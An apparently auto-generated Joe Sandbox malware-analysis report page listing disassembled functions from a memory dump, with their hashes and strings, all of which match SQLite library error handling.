Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd

Similarity

API ID:
String ID: %s at line %d of [%.10s]$database corruption$fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f
API String ID: 0-2469029621
Opcode ID: e388afb6a151062a226c2af0f070b1cc65e593ad3a05626bfdee6a574d358381
Instruction ID: ddb4440691145939db07001015489714291da731d9a6b17f4230e1897397f986
Opcode Fuzzy Hash: e388afb6a151062a226c2af0f070b1cc65e593ad3a05626bfdee6a574d358381
Instruction Fuzzy Hash: CD21CB7542C2D18EC3088F24A095EA1BBB1BF15310B0B95C9D8959F3A3E3B9C5D9C7E1

Function 6BC57400 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 62COMMON

Download Yara Rule

APIs

Part of subcall function 6BC55DA0: SI769271af19a2299d.SQLITE.INTEROP(00000015,API call with %s database connection pointer,NULL,?,6BC560BE), ref: 6BC55DB1

SI769271af19a2299d.SQLITE.INTEROP(00000015,%s at line %d of [%.10s],misuse,0002B160,fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f,?,?,?,6BC574BE,?,?,?,?,?,00000000), ref: 6BC5748A

Strings

%s at line %d of [%.10s], xrefs: 6BC57483
fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f, xrefs: 6BC57474
misuse, xrefs: 6BC5747E

Memory Dump Source

Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true

Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd

Similarity

API ID: I769271af19a2299d.
String ID: %s at line %d of [%.10s]$fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f$misuse
API String ID: 2981141233-160653349
Opcode ID: 2c06fa9dfaf6e67ef3c87ffc1ff66832d9a009fc5eb505ab4b709beb72933011
Instruction ID: ac8172a7f58690d1af773b06cf39a5ee65dc4cf605d60a81fe0ff0fd44d808da
Opcode Fuzzy Hash: 2c06fa9dfaf6e67ef3c87ffc1ff66832d9a009fc5eb505ab4b709beb72933011
Instruction Fuzzy Hash: 3B11E5B3B101156BDB009A6D9C05E6BBB58AF81764F048066FD18DB301F72CFA719BE5

Function 6BC3FA80 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 59COMMON

Download Yara Rule

APIs

SIdb45e174afb28e2c.SQLITE.INTEROP(JSON path error near '%q',?), ref: 6BC3FAC7
SIaa0f8e0c251cfd1d.SQLITE.INTEROP(00000000), ref: 6BC3FAF0
SI1bf8975e567ea97a.SQLITE.INTEROP ref: 6BC3FB00

Strings

JSON path error near '%q', xrefs: 6BC3FAC2

Memory Dump Source

Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true

Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd

Similarity

API ID: I1bf8975e567ea97a.Iaa0f8e0c251cfd1d.Idb45e174afb28e2c.
String ID: JSON path error near '%q'
API String ID: 2784778010-481711382
Opcode ID: e5784e2a4c9717e49b584cfa2d1684093d0dcbcd3d51438413a05e01c93681b7
Instruction ID: 87b6ccab20aa0dda5425c5254515550691a69e71abb60f982967ef54d84e1687
Opcode Fuzzy Hash: e5784e2a4c9717e49b584cfa2d1684093d0dcbcd3d51438413a05e01c93681b7
Instruction Fuzzy Hash: 8E01BEB19792212AE71457685C02F7772C89F4162CF500769FC79972C1FBA99A1482E3

Function 6BC55E10 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 59COMMON

Download Yara Rule

Strings

%s at line %d of [%.10s], xrefs: 6BC55E84
fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f, xrefs: 6BC55E75
misuse, xrefs: 6BC55E7F

Memory Dump Source

Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true

Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd

Similarity

API ID:
String ID: %s at line %d of [%.10s]$fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f$misuse
API String ID: 0-160653349
Opcode ID: 031bf3bd4f69581db106357e1f1334e3967a945b83c6721744d5ac9a8a0c630b
Instruction ID: bc37d01425a7c39abf46bd4cf7daf673e575ecbfef9ebcdc38ef9cd72da6f6b1
Opcode Fuzzy Hash: 031bf3bd4f69581db106357e1f1334e3967a945b83c6721744d5ac9a8a0c630b
Instruction Fuzzy Hash: 3C112573A193445BC710DF9CA88189AF7D4FB44621F4006AEFE9C9B241E7349A2483E6

Function 6BC55FF0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 58COMMON

Download Yara Rule

APIs

SI769271af19a2299d.SQLITE.INTEROP(00000015,%s at line %d of [%.10s],misuse,000062A9,fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f,00000000,00000000,?,6BC6F1E7,6BD15CA8,00000001,?,6BC6F6C5,?,?,6BCC5767), ref: 6BC5601F

Strings

%s at line %d of [%.10s], xrefs: 6BC56018
fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f, xrefs: 6BC56009
misuse, xrefs: 6BC56013

Memory Dump Source

Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true

Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd

Similarity

API ID: I769271af19a2299d.
String ID: %s at line %d of [%.10s]$fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f$misuse
API String ID: 2981141233-160653349
Opcode ID: 90c66c753da93cce1f77602d66ff707c201b63c55777c9a375929904836b519f
Instruction ID: abd374ee4d91dbda7109a1e5a5057c733f919b605ee0a04f86208626c7f8d524
Opcode Fuzzy Hash: 90c66c753da93cce1f77602d66ff707c201b63c55777c9a375929904836b519f
Instruction Fuzzy Hash: 01114C72921A005BE7109F259806A1B7B649BC1B79F004078E91D9B341FB3DD2358BBE

Function 6BC6D4E0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 58COMMON

Download Yara Rule

APIs

SI769271af19a2299d.SQLITE.INTEROP(0000000B,%s at line %d of [%.10s],database corruption,000357BC,fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f,?,?), ref: 6BC6D536

Strings

%s at line %d of [%.10s], xrefs: 6BC6D52F
database corruption, xrefs: 6BC6D52A
fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f, xrefs: 6BC6D520

Memory Dump Source

Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true

Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd

Similarity

API ID: I769271af19a2299d.
String ID: %s at line %d of [%.10s]$database corruption$fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f
API String ID: 2981141233-2469029621
Opcode ID: 30b163e4c1269828cf859de300b642b245e267e909e72300f07d18ea6734cb42
Instruction ID: 52b6b2d9ed5b6190f176147d9d033b590848c482dd00d4d049e370073bbb0a38
Opcode Fuzzy Hash: 30b163e4c1269828cf859de300b642b245e267e909e72300f07d18ea6734cb42
Instruction Fuzzy Hash: C211E5F1969115ABDB00DF54CC81F6A7768EF41788F204095FC1A9B551FB38DB44C6A2

Function 6BC545D0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 56COMMON

Download Yara Rule

APIs

SI769271af19a2299d.SQLITE.INTEROP(0000000B,%s at line %d of [%.10s],database corruption,0001141D,fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f), ref: 6BC5464B

Strings

%s at line %d of [%.10s], xrefs: 6BC5463E
database corruption, xrefs: 6BC54639
fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f, xrefs: 6BC5462F

Memory Dump Source

Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true

Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd

Similarity

API ID: I769271af19a2299d.
String ID: %s at line %d of [%.10s]$database corruption$fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f
API String ID: 2981141233-2469029621
Opcode ID: 7d0124f1204b869eca80bda6339f004389bbcb32a82d317c1e4df4fbac88e198
Instruction ID: 7f40268abc3febd8aa27b03069a4de49484d507cee32dd808469d0b9656a56c6
Opcode Fuzzy Hash: 7d0124f1204b869eca80bda6339f004389bbcb32a82d317c1e4df4fbac88e198
Instruction Fuzzy Hash: A611A071A052009FC300DF68C885B56BBE4DB41318F5481D9E81C9F246FB77E962CBE2

Function 6BC574D0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 51COMMON

Download Yara Rule

APIs

Part of subcall function 6BC55DA0: SI769271af19a2299d.SQLITE.INTEROP(00000015,API call with %s database connection pointer,NULL,?,6BC560BE), ref: 6BC55DB1

SI769271af19a2299d.SQLITE.INTEROP(00000015,%s at line %d of [%.10s],misuse,0002AE43,fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f), ref: 6BC574FA

Strings

%s at line %d of [%.10s], xrefs: 6BC574F3
fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f, xrefs: 6BC574E4
misuse, xrefs: 6BC574EE

Memory Dump Source

Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true

Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd

Similarity

API ID: I769271af19a2299d.
String ID: %s at line %d of [%.10s]$fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f$misuse
API String ID: 2981141233-160653349
Opcode ID: 61e0d5cb86a205084ebcf98ab28ef8456a430dfae79fc39797e2476c056d88d4
Instruction ID: 97d0687bad42dfe631492e1304135840eddb2b953af846f7e114fee9f59563dc
Opcode Fuzzy Hash: 61e0d5cb86a205084ebcf98ab28ef8456a430dfae79fc39797e2476c056d88d4
Instruction Fuzzy Hash: 55014E33B182051BE6044F1AF84196A779AEBC0735794416FEA298B2C0FB25F5B116D8

Function 6BC57B80 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 48COMMON

Download Yara Rule

APIs

Part of subcall function 6BC55DA0: SI769271af19a2299d.SQLITE.INTEROP(00000015,API call with %s database connection pointer,NULL,?,6BC560BE), ref: 6BC55DB1

SI769271af19a2299d.SQLITE.INTEROP(00000015,%s at line %d of [%.10s],misuse,0002ABA1,fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f), ref: 6BC57BA8

Strings

%s at line %d of [%.10s], xrefs: 6BC57BA1
fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f, xrefs: 6BC57B92
misuse, xrefs: 6BC57B9C

Memory Dump Source

Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true

Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd

Similarity

API ID: I769271af19a2299d.
String ID: %s at line %d of [%.10s]$fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f$misuse
API String ID: 2981141233-160653349
Opcode ID: 00ff59cb5b58375b1cdd41b527ee0e8c08eee3531f07200b4a036d2d8870a12d
Instruction ID: 798b89a124e48e0b0a01d38c981385a370678ccef4d15743f2a9f2c53d125a71
Opcode Fuzzy Hash: 00ff59cb5b58375b1cdd41b527ee0e8c08eee3531f07200b4a036d2d8870a12d
Instruction Fuzzy Hash: A701D472B157155BDB009F799C05F4B37A4AF00719B0080AAFD9EEB201F628E67087A5

Function 6BC57C10 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 47COMMON

Download Yara Rule

APIs

Part of subcall function 6BC55DA0: SI769271af19a2299d.SQLITE.INTEROP(00000015,API call with %s database connection pointer,NULL,?,6BC560BE), ref: 6BC55DB1

SI769271af19a2299d.SQLITE.INTEROP(00000015,%s at line %d of [%.10s],misuse,0002AB89,fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f), ref: 6BC57C38

Strings

%s at line %d of [%.10s], xrefs: 6BC57C31
fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f, xrefs: 6BC57C22
misuse, xrefs: 6BC57C2C

Memory Dump Source

Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true

Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd

Similarity

API ID: I769271af19a2299d.
String ID: %s at line %d of [%.10s]$fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f$misuse
API String ID: 2981141233-160653349
Opcode ID: 365abc3d0cb56df94a537f85a8dd67b1a3371c75dc576ee7302e2c875d6056c4
Instruction ID: f20f11fb9b7e3b0220f5067267a342615ed8cd1cdc791ee9eebe70496d62616e
Opcode Fuzzy Hash: 365abc3d0cb56df94a537f85a8dd67b1a3371c75dc576ee7302e2c875d6056c4
Instruction Fuzzy Hash: 9A0184B2B107105BDB109F799801A87B7989F41625F00446AEA5EEB341EA38F52487A5

Function 6BC570B0 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 47COMMON

Download Yara Rule

APIs

Part of subcall function 6BC55DA0: SI769271af19a2299d.SQLITE.INTEROP(00000015,API call with %s database connection pointer,NULL,?,6BC560BE), ref: 6BC55DB1

SI769271af19a2299d.SQLITE.INTEROP(00000015,%s at line %d of [%.10s],misuse,0002B599,fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f), ref: 6BC570D8

Strings

%s at line %d of [%.10s], xrefs: 6BC570D1
fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f, xrefs: 6BC570C2
misuse, xrefs: 6BC570CC

Memory Dump Source

Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true

Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd

Similarity

API ID: I769271af19a2299d.
String ID: %s at line %d of [%.10s]$fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f$misuse
API String ID: 2981141233-160653349
Opcode ID: 807833c2053e3efb80140ceda6674d10e60345ec29f1177926362fbb362bbfc6
Instruction ID: b13bdb1f606a24ae06be0e76b736ff97ca1405f1589d9324a334301d116c96ce
Opcode Fuzzy Hash: 807833c2053e3efb80140ceda6674d10e60345ec29f1177926362fbb362bbfc6
Instruction Fuzzy Hash: E001D1723202045BD7009B79EC05B9737DC9B407A8F0480A2E90DCF242FB29EA7093A9

Function 6BC636F0 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 47COMMON

Download Yara Rule

APIs

SI769271af19a2299d.SQLITE.INTEROP(0000000B,%s at line %d of [%.10s],database corruption,00011F6E,fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f,00000000,00000000,00000000,?,6BC680AE,?), ref: 6BC63713

Strings

%s at line %d of [%.10s], xrefs: 6BC6370C
database corruption, xrefs: 6BC63707
fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f, xrefs: 6BC636FD

Memory Dump Source

Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true

Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd

Similarity

API ID: I769271af19a2299d.
String ID: %s at line %d of [%.10s]$database corruption$fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f
API String ID: 2981141233-2469029621
Opcode ID: 0d70748de8ab59278670871cdbc1ce4841cdd80923cbaca8dcf67f2045324dc6
Instruction ID: 06dbff56e36222908b0d521a363ba08db3af0b57653bacd81fe1ebebccf2c910
Opcode Fuzzy Hash: 0d70748de8ab59278670871cdbc1ce4841cdd80923cbaca8dcf67f2045324dc6
Instruction Fuzzy Hash: D801472215C1602AD204DF38ADC1E62BFA9CF5826C72841EDE2089F293F623D50383A1

Function 6BC57850 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 46COMMON

Download Yara Rule

APIs

Part of subcall function 6BC55DA0: SI769271af19a2299d.SQLITE.INTEROP(00000015,API call with %s database connection pointer,NULL,?,6BC560BE), ref: 6BC55DB1

SI769271af19a2299d.SQLITE.INTEROP(00000015,%s at line %d of [%.10s],misuse,0002AC8C,fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f,?,?,?,?,6BC6FC50,?,00000000,00000000,?), ref: 6BC5787A

Strings

%s at line %d of [%.10s], xrefs: 6BC57873
fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f, xrefs: 6BC57864
misuse, xrefs: 6BC5786E

Memory Dump Source

Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true

Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd

Similarity

API ID: I769271af19a2299d.
String ID: %s at line %d of [%.10s]$fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f$misuse
API String ID: 2981141233-160653349
Opcode ID: 26fc62f83a88a3982f12723d3e6e6e5ee3b39eb32039aad1fd49cf6ffc2e77b7
Instruction ID: 89983c9a3ee2125a08ee5496cf60f49f2a492218266f62e58173f7399b4931ce
Opcode Fuzzy Hash: 26fc62f83a88a3982f12723d3e6e6e5ee3b39eb32039aad1fd49cf6ffc2e77b7
Instruction Fuzzy Hash: BC01D6767147145BD7009F69EC029C77798EF44725B00407AFA1EEB301F638F62186B5

Function 6BC51BC0 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 45COMMON

Download Yara Rule

APIs

SI769271af19a2299d.SQLITE.INTEROP(00000007,failed to %s %u bytes (%lu), heap=%p,HeapReAlloc,?,00000000), ref: 6BC51C16

Strings

HeapAlloc, xrefs: 6BC51BFD
HeapReAlloc, xrefs: 6BC51BF6, 6BC51C0E
failed to %s %u bytes (%lu), heap=%p, xrefs: 6BC51C0F

Memory Dump Source

Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true

Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2213023190.000000006BD1C000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6bbd0000_v2.jbxd

Similarity

API ID: I769271af19a2299d.
String ID: HeapAlloc$HeapReAlloc$failed to %s %u bytes (%lu), heap=%p
API String ID: 2981141233-2123888023
Opcode ID: 200509aac918933e9a667398f1c6ab5fcdd3eec13beec6936d808d2961e175bc
Instruction ID: f6bb381eb38e4adeb2132279f47728181b7490e9508a8065a0ca2e3100794575
Opcode Fuzzy Hash: 200509aac918933e9a667398f1c6ab5fcdd3eec13beec6936d808d2961e175bc
Instruction Fuzzy Hash: AEF0F9B2A552147BD6004EDE8C89D5BB36CDB49695F400151FE08CF200E538EE104264

Function 6BC57F20 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 45COMMON

Download Yara Rule

APIs

Part of subcall function 6BC55DA0: SI769271af19a2299d.SQLITE.INTEROP(00000015,API call with %s database connection pointer,NULL,?,6BC560BE), ref: 6BC55DB1

SI769271af19a2299d.SQLITE.INTEROP(00000015,%s at line %d of [%.10s],misuse,0002AA07,fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f), ref: 6BC57F48

Strings

%s at line %d of [%.10s], xrefs: 6BC57F41
fcb4fd26a8c624f2e433ba6a6b153343225cc9d85dd297502ca5c696b603431f, xrefs: 6BC57F32
misuse, xrefs: 6BC57F3C

Memory Dump Source

Source File: 00000007.00000002.2206517691.000000006BBD1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BBD0000, based on PE: true

Associated: 00000007.00000002.2204171827.000000006BBD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212459047.000000006BCEF000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212827478.000000006BD14000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212901838.000000006BD18000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000007.00000002.2212959453.000000006BD19000.00000004.00000001.01000000.0000000D.sdmpDownload File
